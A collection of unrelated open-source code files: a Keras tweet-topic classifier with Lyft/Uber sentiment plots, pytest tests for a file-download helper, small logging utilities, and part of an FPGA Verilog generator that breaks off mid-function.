recurrent_regularizer=None, bias_regularizer=None, activity_regularizer=None,
kernel_constraint=None, recurrent_constraint=None, bias_constraint=None,
dropout=0.0, recurrent_dropout=0.0, implementation=1, return_sequences=True,
return_state=False, go_backwards=False, stateful=False, unroll=False))
model.add(keras.layers.Dense(120, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.sigmoid))
model.compile(optimizer=tensorflow.train.AdamOptimizer(),
loss=losses.mean_squared_error,
metrics=['accuracy'])
#model.summary()
model.fit(nndocs2, dummy_labs, epochs=300, verbose = 1)
predresult = model.predict(nndocs2)
result_vecttrain = []
for i in predresult:
    result_vecttrain.append(np.argmax(i))
ylabnum = []
for i in dummy_labs:
    ylabnum.append(np.argmax(i))
resdf = pd.DataFrame()
resdf['ylab'] = ylabnum
resdf['pred'] = result_vecttrain
resdf['res'] = np.where(resdf['ylab']==resdf['pred'],1,0)
#This model has no predictive power.. redoing with common word TF matrix
#np.mean(resdf['res'] )
#model.summary()
#NN with TF word mapping
#1449 - 1749
txt_twt = list(tweetdf['processed_docs'])
corpusdf = pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+corpuslist[0])
for i in corpuslist[1:]:
    corpusdf = corpusdf.append(pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+i))
corpusdf['final_tweets'] = corpusdf['final_tweets'].fillna(" ")
corpusdf['processed_docs'] = corpusdf['final_tweets'].map(preprocess)
twtcrp = list(corpusdf['processed_docs'])
twtcrp_fin = list(corpusdf['final_tweets'])
#txt_twt = txt_twt.fillna([" "])
#twtcrp = twtcrp.fillna([" "])
wds = []
for i in txt_twt:
    for j in i:
        try:
            wds.append(j)
        except:
            pass
# NOTE: the reset below discards the tweet words collected just above, so the
# feature vocabulary is built from the labeled corpus only (possibly a slip,
# since the earlier section pooled both sources)
wds = []
for i in twtcrp:
    for j in i:
        try:
            wds.append(j)
        except:
            pass
dat = pd.DataFrame()
dat['wds'] = wds
dat['cnt'] = 1
UWs = pd.pivot_table(data = dat, index = ['wds'],values = ['cnt'], aggfunc = 'sum' )
UWs = UWs.sort_values(by = 'cnt', ascending = False)
UWs.reset_index(inplace= True, drop = False)
UWs2 = UWs[:300]
ww = UWs.copy()
ww.reset_index(inplace= True)
ww = list(ww[(ww['cnt'] >= 20)&(ww['cnt'] <= 30)]['wds'])
WL = list(UWs2['wds'])+ww
twtcrp = list(twtcrp)
#==============================================================================
# Xdf = pd.DataFrame()
# for i in WL:
# Xdf[i] = [0]
#==============================================================================
Xdf = pd.DataFrame()
Xdf['twtcrp'] = twtcrp
Xdf['twtcrp_fin'] = twtcrp_fin
for i in WL:
    Xdf[i] = np.where(Xdf['twtcrp_fin'].str.contains(i),1,0)
#Xdf.drop(['twtcrp_fin','twtcrp','y'], inplace= True, axis = 1)
Xdf.drop(['twtcrp_fin','twtcrp'], inplace= True, axis = 1)
Xarray = np.array(Xdf)
labs = np.array(corpusdf['label'])
labs.shape
#nndocs = nndocs.transpose()
encoder2 = LabelEncoder()
encoder2.fit(labs)
encoded_Ytrain = encoder2.transform(labs)
# convert integers to dummy variables (i.e. one hot encoded)
dummy_labs = np_utils.to_categorical(encoded_Ytrain)
#dummy_labs = dummy_labs.reshape(13898, 4,1)
dummy_labs.shape
Xarray.shape
Xarray= Xarray.reshape(13898,1,787)
dummy_labs= dummy_labs.reshape(13898,1,4)
Xarray[0].shape
# kernel_size=(4,1)
IS = Xarray[0].shape  # the original read nndocs2[0].shape, a leftover from the LSTM section; IS is unused below either way
model = keras.Sequential()
'''model.add(keras.layers.Conv1D(40,kernel_size = (4),activation='sigmoid',input_shape=(None,787), padding='same'))
model.add(keras.layers.Dense(299, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(15, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.relu))'''
model.add(keras.layers.Dense(787, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(300, activation=tensorflow.nn.sigmoid))
model.add(keras.layers.Dense(100, activation=tensorflow.nn.sigmoid))
model.add(keras.layers.Dense(25, activation=tensorflow.nn.sigmoid))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.sigmoid))
#model.add(keras.layers.Dense(3, activation=tensorflow.keras.activations.linear))
model.compile(optimizer=tensorflow.train.AdamOptimizer(),
loss=losses.mean_squared_error,
metrics=['accuracy'])
#model.summary()
model.fit(Xarray, dummy_labs, epochs=100, verbose = 1)
predresult = model.predict(Xarray)
result_vecttrain = []
for i in predresult:
    result_vecttrain.append(np.argmax(i))
ylabnum = []
for i in dummy_labs:
    ylabnum.append(np.argmax(i))
resdf = pd.DataFrame()
resdf['ylab'] = ylabnum
resdf['pred'] = result_vecttrain
resdf['res'] = np.where(resdf['ylab']==resdf['pred'],1,0)
np.mean(resdf['res'])
ylabs = pd.DataFrame()
ylabs['Y'] = labs
ylabs['num'] = ylabnum
ylabs = pd.pivot_table(data = ylabs, index = ['Y'], values = ['num'], aggfunc = 'mean')
ylabs.reset_index(inplace= True, drop = False)
ylabs.set_index('num', inplace=True)
labelmap = ylabs.to_dict()['Y']
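# (added note) labelmap inverts the LabelEncoder, which orders classes
# alphabetically; with the four corpus labels it should come out as
# {0: 'financial', 1: 'news', 2: 'promotional', 3: 'service'}, assuming those
# are the exact label strings in the corpus.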
txt_twt = list(tweetdf['processed_docs'])
txt_twt_fin = list(tweetdf['final_tweets'])
Xdf = pd.DataFrame()
Xdf['txt_twt'] = txt_twt
Xdf['txt_twt_fin'] = txt_twt_fin
for i in WL:
    Xdf[i] = np.where(Xdf['txt_twt_fin'].str.contains(i),1,0)
#Xdf.drop(['txt_twt_fin','txt_twt','y'], inplace= True, axis = 1)
Xdf.drop(['txt_twt_fin','txt_twt'], inplace= True, axis = 1)
Xtest = np.array(Xdf)
Xtest= Xtest.reshape(3400,1,787)
predresult = model.predict(Xtest)
result_vecttrain = []
for i in predresult:
    result_vecttrain.append(np.argmax(i))
resdf = pd.DataFrame()
resdf['pred'] = result_vecttrain
tweetdf['nn_label'] = resdf['pred']
tweetdf['nn_label_val'] = tweetdf['nn_label'].map(labelmap)
pd.pivot_table(data = tweetdf, index = ['NB_label'], values = ['nn_label'], aggfunc = 'count')  # was values=['nn_label_lstm'], a column this script never creates
pd.pivot_table(data = tweetdf, index = ['nn_label_val'], values = ['nn_label'], aggfunc = 'count')
tweetdf.to_csv("C://Users/jliv/downloads/tweets/tweets_final_models.csv")
#Graph classified tweets sentiment
tweetdf = pd.read_csv("C://Users/jliv/downloads/tweets/tweets_final_models.csv")
lyftdf1 = tweetdf[tweetdf['comp']=='lyft']
uberdf1 = tweetdf[tweetdf['comp']=='uber']
topic = 'financial'
lyftdf2 = lyftdf1[lyftdf1['nn_label_val']==topic]
uberdf2 = uberdf1[uberdf1['nn_label_val']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic '+str(topic)+': Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_Financial_NN.png")
plt.show()
topic = 'service'
lyftdf2 = lyftdf1[lyftdf1['nn_label_val']==topic]
uberdf2 = uberdf1[uberdf1['nn_label_val']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic '+str(topic)+': Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_service_NN.png")
plt.show()
topic = 'promotional'
lyftdf2 = lyftdf1[lyftdf1['nn_label_val']==topic]
uberdf2 = uberdf1[uberdf1['nn_label_val']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
lumerge = pd.merge(left = lyftscoresdf, right = uberscoresdf, on = 'date', how = 'left')
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lumerge['compound_x'], label = 'Lyft Average Sentiment')
plt.plot(lumerge['compound_y'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.ylim((-.2,1.2))
plt.legend(loc = 2)
plt.title('NN Topic '+str(topic)+': Lyft with Stronger Sustained Sentiment, Uber not as Promotional')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_promotional_NN.png")
plt.show()
topic = 'news'
lyftdf2 = lyftdf1[lyftdf1['nn_label_val']==topic]
uberdf2 = uberdf1[uberdf1['nn_label_val']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic '+str(topic)+': Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_news_NN.png")
plt.show()
lyftscoresdf = pd.pivot_table(data = lyftdf1, index = ['nn_label_val'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf1, index = ['nn_label_val'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(4),list(lyftscoresdf['nn_label_val']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic Model: Lyft stronger in Financial, Promotional and Service Sentiment')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Sentiment_Topics_NN.png")
plt.show()
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf1, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf1, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic All: Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_NN.png")
plt.show()
#==============================================================================
# File: test_app.py (repo: joepreludian/recrutatech_devops_ia, license: MIT)
#==============================================================================
import os
import pytest

from pathlib import Path

from app import \
    get_downloaded_base156, get_latest_csv_url_from_156, download_file


@pytest.fixture
def supply_download_data():
    return {
        'url': 'https://www.google.com.br/intl/pt-BR/add_url.html',
        'temp_name': 'temp_name',
        'temp_dir': 'source_data'
    }


def test_get_url_156():
    url = get_latest_csv_url_from_156()
    assert 'Base_de_Dados.csv' in url
    # assert 'ISO-8859-1' in charset


def test_download_simple_file(supply_download_data):
    filename, encoding = download_file(url=supply_download_data['url'])
    assert filename == 'add_url.html'
    assert os.path.isfile(filename) is True
    os.unlink('add_url.html')  # Cleaning up file


def test_download_file_with_override(supply_download_data):
    filename, encoding = download_file(
        url=supply_download_data['url'],
        name_override=supply_download_data['temp_name'])
    assert filename == supply_download_data['temp_name']
    assert os.path.isfile(filename) is True
    os.unlink(filename)


def test_download_file_with_folder(supply_download_data):
    filename, encoding = download_file(
        url=supply_download_data['url'],
        folder=supply_download_data['temp_dir'])
    assert filename == f'{supply_download_data["temp_dir"]}/add_url.html'
    assert os.path.isfile(filename) is True
    os.unlink(filename)


def test_download_file_with_folder_and_name_override(supply_download_data):
    filename, encoding = download_file(
        url=supply_download_data['url'],
        folder=supply_download_data['temp_dir'],
        name_override=supply_download_data['temp_name'])
    assert filename == f'{supply_download_data["temp_dir"]}/' \
                       f'{supply_download_data["temp_name"]}'
    assert os.path.isfile(filename) is True
    os.unlink(filename)


def test_download_no_overwrite(supply_download_data):
    filename, encoding = download_file(
        url=supply_download_data['url'],
        folder=supply_download_data['temp_dir'],
        name_override=supply_download_data['temp_name'])
    assert filename == f'{supply_download_data["temp_dir"]}/' \
                       f'{supply_download_data["temp_name"]}'
    assert os.path.isfile(filename) is True

    Path(filename).touch()
    file_stats_touched = os.stat(filename)
    assert type(file_stats_touched.st_mtime) is float

    # Download again and check whether the file was overwritten
    filename, encoding = download_file(
        url=supply_download_data['url'],
        folder=supply_download_data['temp_dir'],
        name_override=supply_download_data['temp_name'],
        force_overwrite=False)
    file_stats_new = os.stat(filename)
    assert file_stats_touched.st_mtime == file_stats_new.st_mtime
    os.unlink(filename)


def test_download_with_overwrite(supply_download_data):
    filename, encoding = download_file(
        url=supply_download_data['url'],
        folder=supply_download_data['temp_dir'],
        name_override=supply_download_data['temp_name'])
    assert filename == f'{supply_download_data["temp_dir"]}/' \
                       f'{supply_download_data["temp_name"]}'
    assert os.path.isfile(filename) is True

    Path(filename).touch()
    file_stats_touched = os.stat(filename)
    assert type(file_stats_touched.st_mtime) is float

    # Download again and check whether the file was overwritten
    filename, encoding = download_file(
        url=supply_download_data['url'],
        folder=supply_download_data['temp_dir'],
        name_override=supply_download_data['temp_name'],
        force_overwrite=True)
    file_stats_new = os.stat(filename)
    assert file_stats_touched.st_mtime != file_stats_new.st_mtime
    os.unlink(filename)


def test_get_base156():
    filename, encoding = get_downloaded_base156()
    assert filename == 'source_data/base156.csv'
    assert os.path.isfile(filename)
#==============================================================================
# File: printutils.py (repo: david-gonzalez/aprendizaje-profundo, license: MIT)
#==============================================================================
import datetime

def print_line(args):
    if args.verbose == 1:
        print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S ") + '-' * 72 )

def print_message(msg,args):
    if args.verbose == 1:
        print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )

def print_new_process(msg,args):
    if args.verbose == 1:
        print_line(args)
        print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )

def print_end(msg,args):
    if args.verbose == 1:
        print_line(args)
        print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )
        print_line(args)
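# Usage sketch (added; not part of the original module). These helpers expect
# any object with a `verbose` attribute, e.g. an argparse Namespace:
#   import argparse
#   args = argparse.Namespace(verbose=1)
#   print_new_process('loading data', args)
#   print_end('done', args)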
#==============================================================================
# File: vtr/vtr_flow/tools/fpgaGen/fpgaGen.py (repo: haojunliu/OpenFPGA,
# license: BSD-2-Clause)
#==============================================================================
import sys
import shlex
import math
import route_modules
def generate_verilog_fpga_header(fpga_tile_fp, num_io_in, num_io_out, num_configs_in, num_configs_en):
    num_top_in = num_io_in - 1
    num_bot_in = num_io_in - 1  # renamed from num_bop_in (typo in the original)
    num_left_in = num_io_in - 1
    num_right_in = num_io_in - 1
    num_top_out = num_io_out - 1
    num_bot_out = num_io_out - 1  # renamed from num_bop_out (typo in the original)
    num_left_out = num_io_out - 1
    num_right_out = num_io_out - 1
    line_to_print = 'module fpga(\n'
    line_to_print = line_to_print + ' input [' + str(num_top_in) + ':0] top_in,\n'
    line_to_print = line_to_print + ' input [' + str(num_bot_in) + ':0] bot_in,\n'
    line_to_print = line_to_print + ' input [' + str(num_left_in) + ':0] left_in,\n'
    line_to_print = line_to_print + ' input [' + str(num_right_in) + ':0] right_in,\n'
    line_to_print = line_to_print + ' output [' + str(num_top_out) + ':0] top_out,\n'
    line_to_print = line_to_print + ' output [' + str(num_bot_out) + ':0] bot_out,\n'
    line_to_print = line_to_print + ' output [' + str(num_left_out) + ':0] left_out,\n'
    line_to_print = line_to_print + ' output [' + str(num_right_out) + ':0] right_out,\n'
    line_to_print = line_to_print + ' input [' + str(num_configs_in-1) + ':0] configs_in,\n'
    line_to_print = line_to_print + ' input [' + str(num_configs_en-1) + ':0] configs_en,\n'
    line_to_print = line_to_print + ' input ff_en, clock, rst\n);\n\n'
    fpga_tile_fp.write(line_to_print)
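# (added illustration) For num_io_in=4, num_io_out=2, num_configs_in=32 and
# num_configs_en=8 (values chosen only for this example), the function above
# emits, modulo spacing:
#   module fpga(
#     input [3:0] top_in,
#     input [3:0] bot_in,
#     ...
#     output [1:0] right_out,
#     input [31:0] configs_in,
#     input [7:0] configs_en,
#     input ff_en, clock, rst
#   );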
def generate_verilog_wires(fpga_tile_fp, fpga_route, const_node_count):
    fpga_tile_fp.write(' // Interconnection Wire Declaration\n')
    for i in range (0, const_node_count):
        if fpga_route[i].r_type == route_modules.R_TYPE_OPIN or fpga_route[i].r_type == route_modules.R_TYPE_CHANX or fpga_route[i].r_type == route_modules.R_TYPE_CHANY:
            line_to_print = ' wire wire_' + str(i) + ';\n'
            fpga_tile_fp.write(line_to_print)
def generate_wires(fpga_tile_fp, fpga_route, const_node_count):
    fpga_tile_fp.write('\n\n // Interconnection Wire Declaration\n')
    for i in range (0, const_node_count):
        if fpga_route[i].r_type == route_modules.R_TYPE_OPIN or fpga_route[i].r_type == route_modules.R_TYPE_CHANX or fpga_route[i].r_type == route_modules.R_TYPE_CHANY:
            line_to_print = ' val wire_' + str(i) + ' = Bits(1)\n'
            fpga_tile_fp.write(line_to_print)
def generate_fpga_configs_in(fpga_tile_fp, x_size, y_size):
    fpga_tile_fp.write('\n\n // FPGA TILE CONFIG_IN\n')
    # EDGE (bottom IO row, y = 0)
    for x_cor in range (1, x_size + 1):
        line_to_print = ' io_tile_0_' + str(x_cor) + '.io.configs_in := io.configs_in(' + str(32*x_cor + 31) + ', ' + str(32*x_cor) + ')\n'
        fpga_tile_fp.write(line_to_print)
    # CENTER (IO tiles on the left/right columns, LUT tiles in between)
    for y_cor in range (1, y_size + 1):
        for x_cor in range (0, x_size + 2):
            if x_cor == 0 or x_cor == x_size + 1:
                line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_in := io.configs_in(' + str(32*x_cor + 31) + ', ' + str(32*x_cor) + ')\n'
                fpga_tile_fp.write(line_to_print)
            else:
                line_to_print = ' lut_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_in := io.configs_in(' + str(32*x_cor + 31) + ', ' + str(32*x_cor) + ')\n'
                fpga_tile_fp.write(line_to_print)
    # EDGE (top IO row, y = y_size + 1)
    for x_cor in range (1, x_size + 1):
        line_to_print = ' io_tile_' + str(y_size + 1) + '_' + str(x_cor) + '.io.configs_in := io.configs_in(' + str(32*x_cor + 31) + ', ' + str(32*x_cor) + ')\n'
        fpga_tile_fp.write(line_to_print)
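# (added note) Each tile column x receives a dedicated 32-bit slice of the
# global config bus, bits (32*x + 31) down to 32*x; e.g. column 2 reads
# io.configs_in(95, 64).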
def generate_verilog_lut_tile_ipin (fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count):
    fpga_tile_fp.write('\n\n // LUT TILE IPIN\n')
    for x_cor in range (1, x_size + 1):
        for y_cor in range (1, y_size + 1):
            this_tile = fpga_lut_tile[y_cor-1][x_cor-1]
            ipin_count = 0
            line_to_print = ' assign lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_ipin_in = {'
            for i in range (this_tile.num_ipin - 1, -1, -1):
                for j in range (len(fpga_route[this_tile.ipin_list[i]].sup_r) - 1, -1, -1):
                    line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.ipin_list[i]].sup_r[j])
                    ipin_count = ipin_count + 1
                    if i != 0 or j != 0:
                        line_to_print = line_to_print + ', '
            line_to_print = line_to_print + '};\n'
            fpga_tile_fp.write(line_to_print)
            line_to_print = ' // IPIN TOTAL: ' + str(ipin_count) + '\n'
            fpga_tile_fp.write(line_to_print)
def generate_verilog_lut_tile_opin (fpga_tile_fp, fpga_lut_tile, x_size, y_size):
    fpga_tile_fp.write('\n\n // FPGA TILE OPIN\n')
    for y_cor in range (1, y_size + 1):
        for x_cor in range (1, x_size + 1):
            this_tile = fpga_lut_tile[y_cor-1][x_cor-1]
            for i in range (0, len(this_tile.opin_list)):
                opin_id = this_tile.opin_list[i]
                line_to_print = ' assign wire_' + str(opin_id) + ' = '
                line_to_print = line_to_print + 'lut_tile_' + str(y_cor) + '_' + str(x_cor) + '_opin_out[' + str(i) + '];\n'
                fpga_tile_fp.write(line_to_print)
def generate_lut_tile_opin (fpga_tile_fp, fpga_lut_tile, x_size, y_size):
    fpga_tile_fp.write('\n\n // FPGA TILE OPIN\n')
    for y_cor in range (1, y_size + 1):
        for x_cor in range (1, x_size + 1):
            this_tile = fpga_lut_tile[y_cor-1][x_cor-1]
            for i in range (0, len(this_tile.opin_list)):
                opin_id = this_tile.opin_list[i]
                line_to_print = ' wire_' + str(opin_id) + ' := '
                line_to_print = line_to_print + 'lut_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.opin_out(' + str(i) + ')\n'
                fpga_tile_fp.write(line_to_print)
def generate_verilog_lut_tile_chanxy (fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count):
    fpga_tile_fp.write(' // LUT TILE CHANXY \n')
    for y_cor in range (1, y_size + 1):
        for x_cor in range (1, x_size + 1):
            this_tile = fpga_lut_tile[y_cor-1][x_cor-1]
            chanxy_out_count = 0
            line_to_print = ' assign lut_tile_' + str(y_cor) + '_' + str(x_cor) + '_chanxy_in = {'
            for i in range (len(this_tile.chanxy_out_list) - 1, -1, -1):
                for j in range (len(fpga_route[this_tile.chanxy_out_list[i]].sup_r) - 1, -1, -1):
                    line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.chanxy_out_list[i]].sup_r[j])
                    chanxy_out_count = chanxy_out_count + 1
                    if i != 0 or j != 0:
                        line_to_print = line_to_print + ', '
            line_to_print = line_to_print + '};\n'
            fpga_tile_fp.write(line_to_print)
            line_to_print = ' // CHNAXY TOTAL: ' + str(chanxy_out_count) + '\n'
            fpga_tile_fp.write(line_to_print)
            for i in range (0, len(this_tile.chanxy_out_list)):
                line_to_print = ' assign wire_' + str(this_tile.chanxy_out_list[i]) + ' = lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_chanxy_out[' + str(i) + '];\n'
                fpga_tile_fp.write(line_to_print)
            line_to_print = ' // CHANXY OUT\n'
            fpga_tile_fp.write(line_to_print)
def generate_verilog_io_tile_chanxy (fpga_tile_fp, fpga_io_tile, fpga_route):
    fpga_tile_fp.write(' // FPGA IO CHANXY\n')
    for this_tile in fpga_io_tile:
        if this_tile.num_chanxy_out != 0:
            chanxy_out_count = 0
            line_to_print = ' assign io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_chanxy_in = {'
            for i in range (len(this_tile.chanxy_out_list) - 1, -1, -1):
                chanxy_out_count = chanxy_out_count + 1
                for j in range (len(fpga_route[this_tile.chanxy_out_list[i]].sup_r) - 1, -1, -1):
                    line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.chanxy_out_list[i]].sup_r[j])
                    if i != 0 or j != 0:
                        line_to_print = line_to_print + ', '
            line_to_print = line_to_print + '};\n'
            fpga_tile_fp.write(line_to_print)
            line_to_print = ' // CHNAXY TOTAL: ' + str(chanxy_out_count) + '\n'
            fpga_tile_fp.write(line_to_print)
            for i in range (0, len(this_tile.chanxy_out_list)):
                line_to_print = ' assign wire_' + str(this_tile.chanxy_out_list[i]) + ' = io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_chanxy_out[' + str(i) + '];\n'
                fpga_tile_fp.write(line_to_print)
def generate_verilog_io_tile_ipin (fpga_tile_fp, fpga_io_tile, fpga_route):
fpga_tile_fp.write(' // FPGA IO IPIN\n')
for this_tile in fpga_io_tile:
line_to_print = ' assign io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_ipin_in = {'
for i in range (this_tile.num_ipin - 1, -1, -1):
for j in range (len(fpga_route[this_tile.ipin_list[i]].sup_r) - 1, -1, -1):
line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.ipin_list[i]].sup_r[j])
if i != 0 or j != 0:
line_to_print = line_to_print + ', '
line_to_print = line_to_print + '};\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' // FPGA IPIN IN\n'
fpga_tile_fp.write(line_to_print)
def generate_io_tile_ipin (fpga_tile_fp, fpga_io_tile, fpga_route):
fpga_tile_fp.write(' // FPGA IO IPIN\n')
for this_tile in fpga_io_tile:
line_to_print = ' io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '.io.ipin_in := Cat('
for i in range (0, this_tile.num_ipin):
for j in range (0, len(fpga_route[this_tile.ipin_list[i]].sup_r)):
line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.ipin_list[i]].sup_r[j])
if i != (len(this_tile.ipin_list) - 1) or j != (len(fpga_route[this_tile.ipin_list[i]].sup_r) - 1):
line_to_print = line_to_print + ', '
line_to_print = line_to_print + ')\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' // FPGA IPIN IN\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_io_tile_opin (fpga_tile_fp, fpga_io_tile):
    fpga_tile_fp.write('\n\n // FPGA IO OPIN\n')
    for this_tile in fpga_io_tile:
        for i in range (0, len(this_tile.opin_list)):
            opin_id = this_tile.opin_list[i]
            line_to_print = ' assign wire_' + str(opin_id) + ' = '
            line_to_print = line_to_print + 'io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_opin_out[' + str(i) + '];\n'
            fpga_tile_fp.write(line_to_print)

def generate_io_tile_opin (fpga_tile_fp, fpga_io_tile):
    fpga_tile_fp.write('\n\n // FPGA IO OPIN\n')
    for this_tile in fpga_io_tile:
        for i in range (0, len(this_tile.opin_list)):
            opin_id = this_tile.opin_list[i]
            line_to_print = ' wire_' + str(opin_id) + ' := '
            line_to_print = line_to_print + 'io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '.io.opin_out(' + str(i) + ');\n'
            fpga_tile_fp.write(line_to_print)

def generate_fpga_tile_ff_en (fpga_tile_fp, x_size, y_size):
    fpga_tile_fp.write('\n\n // FPGA TILE FF_EN\n')
    for y_cor in range (1, y_size + 1):
        for x_cor in range (1, x_size + 1):
            line_to_print = ' lut_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.ff_en := io.ff_en\n'
            fpga_tile_fp.write(line_to_print)
def generate_verilog_fpga_tile_declare(fpga_tile_fp, fpga_lut_tile, fpga_io_tile, x_size, y_size, fpga_config_depth, fpga_config_start_index):
line_to_print = '\n\n // FPGA IO TILES DECLARE\n'
fpga_tile_fp.write(line_to_print)
for i in range (0, len(fpga_io_tile)):
this_tile = fpga_io_tile[i]
tile_name = 'io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
if this_tile.num_chanxy_out != 0:
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin_in - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' io_tile_sp_' + str(i) + ' ' + tile_name + '(\n'
if this_tile.num_chanxy_out != 0:
